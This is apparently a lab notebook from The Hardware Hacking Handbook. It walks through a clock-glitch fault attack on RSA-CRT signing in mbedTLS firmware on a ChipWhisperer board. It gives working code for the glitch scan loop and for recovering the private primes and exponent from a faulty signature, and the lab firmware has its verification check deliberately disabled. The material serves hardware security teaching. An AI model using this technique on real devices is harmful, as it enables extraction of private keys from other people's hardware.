# Chapter 6: Bench Time: Fault Injection Lab

This notebook is a companion to Chapter 6 of The Hardware Hacking Handbook by Jasper van Woudenberg and Colin O'Flynn.

- If you'd like to use the simulator, set `SCOPETYPE` to `SIM` and `PLATFORM` to `CWLITEARM`
- If you'd like to use ChipWhisperer hardware, set `SCOPETYPE` to `OPENADC` and `PLATFORM` to `CWLITEARM`.

© 2021. This work is licensed under a [CC BY-SA 4.0 license](https://creativecommons.org/licenses/by-sa/4.0/). 

In [None]:
SCOPETYPE = 'SIM'
PLATFORM = 'CWLITEARM'

## Firmware

Next, let's take a look at the RSA implementation we're attacking. For this attack, we'll be using the `work/projects/chipwhisperer/hardware/victims/firmware/simpleserial-rsa` project folder. There's a few files here, but the important one is `simpleserial-arm-rsa.c`. Open it. As you scroll through, you'll find all our public/private values. Next, navigate to `real_dec()`:

```C
uint8_t buf[128];
uint8_t hash[32];
uint8_t real_dec(uint8_t *pt)
{
     int ret = 0;

     //first need to hash our message
     memset(buf, 0, 128);
     mbedtls_sha256(MESSAGE, 12, hash, 0);

     trigger_high();
     ret = simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign(&rsa_ctx, NULL, NULL, MBEDTLS_RSA_PRIVATE, MBEDTLS_MD_SHA256, 32, hash, buf);
     trigger_low();

     //send back first 48 bytes
     simpleserial_put('r', 48, buf);
     return ret;
}
```

You'll notice that we first hash our message (`"Hello World!"`) using SHA256. Once this is passed to the signature function, it will be padded according to the PKCS#1 v1.5 standard. This isn't too important now, but it will be important later. Next we sign our message using `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`, then send back the first 48 bytes of it. We'll be sending the signature back in multiple chunks to avoid overflowing the CWLite's buffer of 128 bytes via `sig_chunk_1()` and `sig_chunk_2()` directly below this function.

We'll actually skip over `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()` here, since most of the important stuff actually happens in a different function. You should note, however, that this function has been modified to remove a signature check, which would need to be bypassed in a real attack.

Next, find the function `simpleserial_mbedtls_rsa_private()`, a cleaned up version of `mbedtls_rsa_private()`, where the signature calculation actually happens:
```C
/*
 * Do an RSA private key operation
 */
static int simpleserial_mbedtls_rsa_private( mbedtls_rsa_context *ctx,
                 int (*f_rng)(void *, unsigned char *, size_t),
                 void *p_rng,
                 const unsigned char *input,
                 unsigned char *output )

```

scrolling down a bit, we do indeed find that this function uses CRT to speed up the calculation:

```C
    /*
     * Faster decryption using the CRT
     *
     * T1 = input ^ dP mod P
     * T2 = input ^ dQ mod Q
     */
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T1, &T, DP, &ctx->P, &ctx->RP ) );
    MBEDTLS_MPI_CHK( mbedtls_mpi_exp_mod( &T2, &T, DQ, &ctx->Q, &ctx->RQ ) );
```

You can view more of the firmware if you want, but for now let's build our firmware. You can ignore the warnings at the end. 

In [None]:
CRYPTO_TARGET="MBEDTLS"
CRYPTO_OPTIONS="RSA"
NANO_FLASH = "NA"
OPT = "2"
if SCOPETYPE == "CWNANO":
    NANO_FLASH = "32K" #Need nano pro 32
    OPT = "2"

In [None]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET" "$CRYPTO_OPTIONS" "$NANO_FLASH"
cd ../hardware/victims/firmware/simpleserial-rsa
make PLATFORM=$1 CRYPTO_TARGET=$2 CRYPTO_OPTIONS=$3 OPT=2 NANO_FLASH=$4

## Getting a correct signature from the target

Start by initializing the ChipWhisperer:

In [None]:
if SCOPETYPE == 'OPENADC':
    %run "Helper_Scripts/Setup_Generic.ipynb"
 
    scope.clock.adc_src = "clkgen_x1"

Next, program it with our new firmware:

In [None]:
if SCOPETYPE == 'OPENADC':
    import time
    fw_path = "../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-{}.hex".format(PLATFORM)
    cw.program_target(scope, prog, fw_path)
    time.sleep(1)

### Getting the  signature

Let's start by seeing if we can verify the signature that we get back. First, we run the signature calculation (there's a `time.sleep()` here to make sure the calculation finishes. You may need to increase this):

In [None]:
if SCOPETYPE == 'OPENADC':
    import time
    target.flush()
    scope.arm()
    target.write("t\n")

    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=10)
    
    print(scope.adc.trig_count)

As you can see, the signature takes a long time! For the STM32F3, it should be around 10.4M cycles. Next, let's get the rest of the signature back and see what it looks like.

In [None]:
if SCOPETYPE == 'OPENADC':
    target.write("1\n")
    time.sleep(0.2)
    output += target.read(timeout=10)

    target.write("2\n")
    time.sleep(0.2)
    output += target.read(timeout=10)
    
else: # SIM
    output = "r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD\nz00\nr85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D\nz00\nr7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80\nz00"
    
print(output)

You should see something like:
```
r4F09799F6A59081B725599753330B7A2440ABC42606601622FE0C582646E32555303E1062A2989D9B4C265431ADB58DD
z00
r85BB33C4BB237A311BC40C1279528FD6BB36F94F534A4D8284A18AB8E5670E734C55A6CCAB5FB5EAE02BA37E2D56648D
z00
r7A13BBF17A0E07D607C07CBB72C7A7A77076376E8434CE6E136832DC95DB3D80
z00
```

We'll need to strip all the extra simpleserial stuff out. This can be done like so:

In [None]:
newout = output.replace("r", "").replace("\nz00","").replace("\n","")
print(newout)

Then we can convert this to binary using binascii:

In [None]:
from binascii import unhexlify, hexlify
sig = unhexlify(newout)

### Verifying the signature


Finally, we can verify that the signature is correct using the PyCryptodome package:

In [None]:
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5 

from Crypto.Hash import SHA256

e = 0x10001
N = 0x9292758453063D803DD603D5E777D7888ED1D5BF35786190FA2F23EBC0848AEADDA92CA6C3D80B32C4D109BE0F36D6AE7130B9CED7ACDF54CFC7555AC14EEBAB93A89813FBF3C4F8066D2D800F7C38A81AE31942917403FF4946B0A83D3D3E05EE57C6F5F5606FB5D4BC6CD34EE0801A5E94BB77B07507233A0BC7BAC8F90F79
m = b"Hello World!"

hash_object = SHA256.new(data=m)
pub_key = RSA.construct((N, e))
signer = PKCS1_v1_5.new(pub_key) 
sig_check = signer.verify(hash_object, sig)
print(sig_check)

assert sig_check, "Failed to verify signature on device. Got: {}".format(newout)

If everything worked out correctly, you should see `True` printed above. Now onto the actual attack.

## Injecting the fault

This section is broken into two: getting a fault from the CW, and getting the fault from the simulator.

### Getting a simulated fault

If we're running using the RSA CRT simulator instead, we're going to build and sign the message ourselves.

As was mentioned earlier, the message that's signed isn't the original message, it's a PKCS#1 v1.5 padded hash of it. Luckily, this standard's fairly simple. PKCS#1 v1.5 padding looks like:

\|00\|01\|ff...\|00\|hash_prefix\|message_hash\|

Here, the ff... part is a string of ff bytes long enough to make the size of the padded message the same as N, while hash_prefix is an identifier number for the hash algorithm used on message_hash. In our case, SHA256 has the hash prefix `3031300d060960864801650304020105000420`.

The `build_message` function below implements this:

In [None]:
# PKCS#1 v1.5 padding
def build_message(m, N):
    sha_id = "3031300d060960864801650304020105000420"
    N_len = (len(bin(N)) - 2 + 7) // 8
    pad_len = (len(hex(N)) - 2) // 2 - 3 - len(m)//2 - len(sha_id)//2
    padded_m = "0001" + "ff" * pad_len + "00" + sha_id + m
    return padded_m

print("Message:       {}".format(m))

# Encode message
hash_object = SHA256.new(data=m)
hashed_m = hexlify(hash_object.digest()).decode()
padded_m = build_message(hashed_m, N)
msg = int.from_bytes(unhexlify(padded_m), byteorder='big') 
print("Padded/hashed: {}".format(padded_m))

Next, let's calculate the RSA CRT signature, without any faults. We will need the parameters `p` and `q` for this. Just note that the code to recover the primes later on does not use these.

In [None]:
from gmpy2 import invert, powmod, gcd, gcdext

if SCOPETYPE == 'SIM':
    # RSA parameters
    p = 0xc36d0eb7fcd285223cfb5aaba5bda3d82c01cad19ea484a87ea4377637e75500fcb2005c5c7dd6ec4ac023cda285d796c3d9e75e1efc42488bb4f1d13ac30a57
    q = 0xc000df51a7c77ae8d7c7370c1ff55b69e211c2b9e5db1ed0bf61d0d9899620f4910e4168387e3c30aa1e00c339a795088452dd96a9a5ea5d9dca68da636032af
    phi = (p-1)*(q-1)
    d = invert(e, phi)

    # CRT parameters
    dp = invert(e, (p-1))
    dq = invert(e, (q-1))
    qinv = invert(q, p)

    # CRT calculation
    sp = powmod(msg, dp, p)
    sq = powmod(msg, dq, q)
    s_crt = sq + q * ((sp-sq) * qinv % p)

    # Use previous captured corect signature, to verify they are the same
    s = int.from_bytes(sig, byteorder='big') 
    print("Signature:  {}".format(hex(s)))
    print("s == s_crt? {}".format(s == s_crt))

Now that we have a correct signature calculated from parts `sp` and `sq`, lets flip anywhere between 1 and 20 bits in `sp` to simulate faults. We should get a different signature.

In [None]:
from random import randint, sample

if SCOPETYPE == 'SIM':
    # Now, flip arbitrary bits in sp, and calculate corrupted signature
    bits = sorted(sample(range(0, sp.bit_length()), randint(1,20))) # Get faulty bit indices
    faults = sum([1 << x for x in bits])                            # Convert to large int
    sp_x = sp ^ faults                                              # Add faults to sp
    s_crt_x = sq + q * ((sp_x-sq) * qinv % p)                       # Calculate faulty RSA CRT signature
    print("Faults injected:     {}".format(bits))
    print("Corrupted signature: {}".format(hex(s_crt_x)))
    print("s_crt_x != s_crt?    {}".format(s_crt != s_crt_x))

### Faulting the ChipWhisperer

As usual, we'll start off by setting up the glitch module:

In [None]:
if SCOPETYPE == 'OPENADC':
    scope.glitch.clk_src = "clkgen"
    scope.glitch.output = "clock_xor"
    scope.glitch.trigger_src = "ext_single"
    scope.glitch.repeat = 1
    scope.glitch.width = -9
    scope.glitch.offset = -38.3
    scope.io.hs2 = "glitch"
    print(scope.glitch)
    from collections import namedtuple
    Range = namedtuple('Range', ['min', 'max', 'step'])

Now for our actual attack loop. There's a lot going on here, so we'll move through a little slower than usual. Overall, what we want to do is:
* Insert a glitch
* Read the signature back
* Verify that it's correct

The first step is the same as earlier. For the last two, we'll cheat a little by checking the for the beginning of the correct signature before proceeding, but we could also read back the whole thing:

```python
# Read back signature
output = target.read(timeout=10)
    if "4F09799" not in output:
        #Something abnormal has happened
```

Now that we've found some abnormal behaviour, we need to verify that the target hasn't crashed. This can be done pretty easily by checking if we got anything at all:

```python
if "4F09799" not in output:
    #Something abnormal has happened
    if len(output) > 0:
        # Possible glitch!
    else:
        # Crash, reset and try again
        print(f"Probably crash at {scope.glitch.ext_offset}")
        reset_target(scope)
        time.sleep(0.5)
```

As a last step, we'll build our full signature and do one final check to make sure everything looks okay:

```python
if len(output) > 0:
    # Possible glitch!
    print(f"Possible glitch at offset {scope.glitch.ext_offset}\nOutput: {output}")
    
    # get rest of signature back
    target.go_cmd = '1\\n'
    target.go()
    time.sleep(0.2)
    output += target.read(timeout=10)

    target.go_cmd = '2\\n'
    target.go()
    time.sleep(0.2)
    output += target.read(timeout=10)
    
    # strip out extra simpleserial stuff
    newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    
    print(f"Full output: {newout}")
    if (len(newout) == 256) and "r0001F" not in output:
        print("Very likely glitch!")
        break
```

We'll add in scanning over different offsets as well. We'll start at an offset of 7M cycles. We actually have a lot of area that we could place the glitch in, so the starting point is fairly arbitrary. For the STM32F3, this places the glitch near the beginning of the calculation for $s_2$. If you'd like, you can move `trigger_low()` into `simpleserial_mbedtls_rsa_private()` to see how long different parts of the algorithm take.

All together, our attack loops looks like this:

In [None]:
if SCOPETYPE == 'OPENADC':

    from tqdm import tnrange
    import time
    for i in tnrange(7000000, 7100000):
        scope.glitch.ext_offset = i
        scope.adc.timeout = 3
        target.flush()
        scope.arm()
        target.write("t\n")

        ret = scope.capture()
        if ret:
            print('Timeout happened during acquisition')
        time.sleep(2)

        # Read back signature
        output = target.read(timeout=10)
        if "4F09799" not in output:
            # Something abnormal happened
            if len(output) > 0:
                # Possible glitch!
                print("Possible glitch at offset {}\nOutput: {}".format(scope.glitch.ext_offset, output))

                # Get rest of signature back
                target.write("1\n")
                time.sleep(0.2)
                output += target.read(timeout=10)

                target.write("2\n")
                time.sleep(0.2)
                output += target.read(timeout=10)

                # Strip out extra simpleserial stuff
                newout = output.replace("r", "").replace("\nz00","").replace("\n","")
                print("Full output: {}".format(newout))
                if (len(newout) == 256) and "r0001F" not in output:
                    print("Very likely glitch!")
                    break
            else:
                # Crash, reset and try again
                print("Probably crashed at {}".format(scope.glitch.ext_offset))
                reset_target(scope)
                time.sleep(0.5)
                
    # Convert signature to integer
    sig = unhexlify(newout)
    s_crt_x = mpz(int.from_bytes(sig, "big"))


An output from this script could be:
```
Probably crashed at 7000014
Probably crashed at 7000017
Probably crashed at 7000028
Possible glitch at offset 7000042
Output: <removed for brevity>

Full output: 1187B790564D43D48CD140A7FF890EEA713D1603D8CBC57CF070EE951479C75E93FE98AD04F535109D957F9AB9AA25DB2FB1A5521C68C986A270782B7A579A12B9AE79DF2F59ED9E6694C64C40AAD9FE46B203DB75792016EEA315F7CAA8F9AAC0FD89052FFAC29C022E32B541B150419E2B6604DDA6BF2582F62C9F7876393D
Very likely glitch!```

## Completing The Attack

With a faulty signature, we can start our first recovery using a correct signature.

In [None]:
# Recover p and q from corrupted signature and correct signature
calc_q = gcd(s_crt_x - s_crt, N)
calc_p = N // calc_q
print("Recovered p using s: {}".format(hex(calc_p)))
print("Recovered q using s: {}".format(hex(calc_q)))
print("pq == N?             {}".format(calc_q * calc_p == N))

If `pq == N`, that means we have our primes!

In case we don't have a correct signature over the same message, we will extract the primes from the corrupted signature and knowledge of the message.

In [None]:
# Recover p and q from corrupted signature and message
calc_q2 = gcd(msg - s_crt_x ** e, N)
calc_p2 = N // calc_q2
print("Recovered p using m: {}".format(hex(calc_p2)))
print("Recovered q using m: {}".format(hex(calc_q2)))
print("pq == N?             {}".format(calc_q2 * calc_p2 == N))

Finally, there's d, which can be derived by:

In [None]:
phi = (calc_q - 1)*(calc_p - 1)
gcd, d_test, b = gcdext(e, phi)

print("Recovered d: {}".format(hex(d_test)))
print("d_test == d? {}".format(d_test == d))

Now that we have all parameters, we can also recover the original message.

In [None]:
# Decrypt the message from recovered private keys and print!
m_calc = int(powmod(s_crt, e, N))
print("m_calc == m? {}".format(msg == m_calc))
m_str = hexlify(m_calc.to_bytes((m_calc.bit_length() + 7) // 8, byteorder='big'))
print("Message decrypted: {}".format(m_str))

## Going Further

There's still more you can do with this attack:

* You can try glitching the other part of the signature calculation to verify that you get the other prime factor of N out
* We used clock glitching in this tutorial. You may want to try it with voltage glitching as well

As mentioned earlier in the tutorial, a verification of the calculated signature was removed:
```C
    /* Compare in constant time just in case */
    /* for( diff = 0, i = 0; i < ctx->len; i++ ) */
    /*     diff |= verif[i] ^ sig[i]; */
    /* diff_no_optimize = diff; */

    /* if( diff_no_optimize != 0 ) */
    /* { */
    /*     ret = MBEDTLS_ERR_RSA_PRIVATE_FAILED; */
    /*     goto cleanup; */
    /* } */

```

This part is near the end of `simpleserial_mbedtls_rsa_rsassa_pkcs1_v15_sign()`. If you want a larger challenge, you can try uncommenting that and trying to glitch past it as well.